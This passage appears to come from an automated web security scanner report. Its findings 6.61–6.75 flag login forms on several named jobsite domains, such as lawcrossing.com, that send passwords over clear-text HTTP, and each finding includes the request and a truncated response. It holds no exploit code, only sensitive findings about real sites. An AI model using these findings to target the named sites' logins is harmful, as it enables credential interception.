rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.62. http://www.insurcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insurcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ecpq66kc364asgd97g8ralsb30; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 127189

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.insurcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.63. http://www.intellectualpropertycrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellectualpropertycrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ajhbe62huej7qoq1voq8lsteu4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.intellectualpropertycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.64. http://www.internshipcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internshipcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ol3jscv0r1flgbhg63mnc21c14; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.internshipcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.65. http://www.j2eecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.j2eecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ov4jbk2b77peoidd95qi1upha7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111694

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.j2eecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.66. http://www.journalismcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.journalismcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bai2pstv5ao7rak55ou3up3b17; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:09 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111259

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.journalismcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.67. http://www.lawcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211139

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

6.68. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /article/6070/Brooklyn-Law-School/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:46 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vl8einafm1n540cl32q4l331g3; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144794

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

6.69. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /article/6154/Anne-Healy-LIDS/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:39 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kn84m4kfq0k9i5413blcf4rdv5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144589

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

6.70. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:09 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d2dplbacjvjkr67gtesru8aj04; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103110

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

6.71. http://www.lawcrossing.com/lcjssearchresults.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /lcjssearchresults.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e5iouh0ohr4puh7rj3ce3m03n5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92150

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

6.72. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /salarysurvey/lcsalarysurvey.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:29:48 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ru8l85l763haf7r7bf41h50d6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103222

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
    &nbsp;&nbsp;<input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
&nbsp;&nbsp;<input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

6.73. http://www.lawschoolloans.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lawschoolloans.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:18 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=e93dd05f80eebb1753b70ce5d0a8fbb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 226477

<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws_scroll.js"></scrip
...[SNIP]...
<td width="4%"><form name="formlogin" method="POST" onsubmit="return validateLoginForm();">
                       <input type="hidden" name="clslsluserlogin_hdnsubmited" value="1">
...[SNIP]...
<td width="70%"><input type="password" name="clsregistration_password" size="25" class="input"></td>
...[SNIP]...

6.74. http://www.logisticscrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logisticscrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bge253g268slkfifh0ptl28dv1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.logisticscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.75. http://www.managercrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.managercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=346sk676v0frg7f966ahgna1s4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128519

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.managercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
